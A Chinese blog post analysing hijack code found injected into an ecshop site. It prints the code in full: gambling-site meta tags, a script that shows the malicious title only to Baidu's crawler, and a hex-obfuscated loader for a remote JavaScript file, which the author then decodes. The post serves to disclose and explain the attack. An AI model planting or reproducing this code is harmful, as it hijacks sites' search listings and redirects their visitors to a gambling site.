• 欢迎访问金刀客博客!
  • 2019,春节快乐!

【原创文章】一段很有意思的网站标题、关键字劫持代码

原创天空 admin 67923次浏览 已收录 4个评论

最近ecshop的远程执行漏洞闹得很凶,处理这个问题的时候发现一个很有意思的劫持代码

<meta property="qc:admins" content="4201266257651135546375" /><meta property="wb:webmaster" content="05cb73c74424929b" /><title>重庆幸运农场官方投注平台_重庆幸运农场投注平台【官方授权入口】</title><meta name="keywords" content="重庆幸运农场,重庆幸运农场投注,重庆幸运农场平台,重庆幸运农场官方" /><meta name="description" content="重庆幸运农场官方投注平台【95588K.com】时时精准提供重庆福彩公司详尽研究分析总结,重庆幸运农场开奖视频,重庆幸运农场结果分析,重庆幸运农场网上投注,重庆幸运农场过往各开奖记录,重庆幸运农场开奖结果,网上开户,专业的开奖视频直播资讯网"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="{$page_title}"}</script><script type="text/javascript">   window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x39\x35\x35\x38\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');  </script>

这个代码的作用就是当你以前打开过这个网站,那么网站标题还是显示原来网站的$page_title

当你是新访客,则直接跳转到]www.95588K.com

并且啊,搜索引擎收录的也是这个恶意title

比较隐蔽,一开始都没发现,后面有人反应这个问题,才察觉。

加密部分解密下

"\x64\x6f\x63\x75\x6d\x65\x6e\x74"

解密为

"document"
"\x77\x72\x69\x74\x65"

解密为

"write"
'\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x39\x35\x35\x38\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'

解密为

'<script type="text/javascript" src="https://sfsfdsf.oss-cn-hongkong.aliyuncs.com/95588.js"></script>'

整段代码就是

<script type="text/javascript">   window["document"]["write"] ('<script type="text/javascript" src="https://sfsfdsf.oss-cn-hongkong.aliyuncs.com/95588.js"></script>');  </script>

金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明【原创文章】一段很有意思的网站标题、关键字劫持代码
喜欢 (13)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(4)个小伙伴在吐槽
  1. 请问怎么解密的呢
    匿名2019-02-12 23:02 回复
    • 用函数截获变量,然后输出
      admin2021-05-09 22:20 回复
  2. 这个是可以直接放在 index里面的吧
    匿名2018-10-10 15:48 回复
    • admin2021-05-09 22:19 回复